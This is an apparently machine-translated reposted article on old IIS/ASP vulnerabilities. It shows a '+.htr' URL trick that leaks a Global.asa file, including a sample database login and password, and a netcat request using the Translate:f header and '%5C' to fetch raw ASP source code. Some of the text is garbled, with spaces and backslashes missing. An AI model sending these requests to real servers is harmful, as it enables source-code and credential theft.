ASP Common Security vulnerabilities (3)

Source: Internet
Author: User
Tags dsn
For example, the Global.asa file above 10.11.11.15 can be obtained using the following url:http://10.11.11.15/global.asa+.htr. Note the UID and PWD in that database connection string. This gives the hacker a user name and password:
SCRIPT language= "VBScript" runat= "Server" >
Sub Application_OnStart
Set Db = Server.CreateObject ("Commerce.dbserver")
db.connectionstring = "DSN=TRANS.DB; Uid=sa; PWD=N0T4U2C "
Db.application = http://10.11.11.15/
Set application ("db") = Db
End Sub
Sub Session_OnStart
' ==visual InterDev generated-dataconnection startspan==
'--project Data Connection
Session ("dataconn_connectionstring") =
"DSN=CERTSRV;DBQ=C:WINNT2SYSTEM32CERTLOGCERTSRV.MDB;DRIVERID=25;
Fil=ms Access; maxbuffersize=512; pagetimeout=5; "
Session ("dataconn_connectiontimeout") = 15
Session ("dataconn_commandtimeout") = 30
Session ("dataconn_runtimeusername") = ""
Session ("Dataconn_runtimepassword") = ""
' ==visual InterDev generated-dataconnection endspan==
End Sub
/script
Microsoft has already done so to fix this security vulnerability.
After the HTR security vulnerabilities were corrected, the hackers found a new entry point: The Translate:f module security vulnerabilities. The Translate:f module is part of a WebDAV designed by Microsoft for FrontPage 2000 and FrontPage Server Extensions on Windows 2000. If a backslash () is appended to the requested file resource, and the Translate:f module is in the HTTP header heading that asks for a callback, the Web server will return the completely unprocessed ASP source code.
The following is an HTTP header that is sent back using Netcat (related URL: http://www.l0pht.com/~weld/netcat/), which can be used to obtain the original program code above the 10.11.11.15 default.asp:
$ nc10.11.11.1580
GET/DEFAULT.ASP%5C http/1.0
host:10.11.11.15
user-agent:mozilla/4.0
Content-length:18
Content-type:text/html
Translate:f
Match=www&errors=0
Note:%5c is used in get-back inquiries.
The 16-bit ASCII code representation of the backslash character () is%5c.
Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.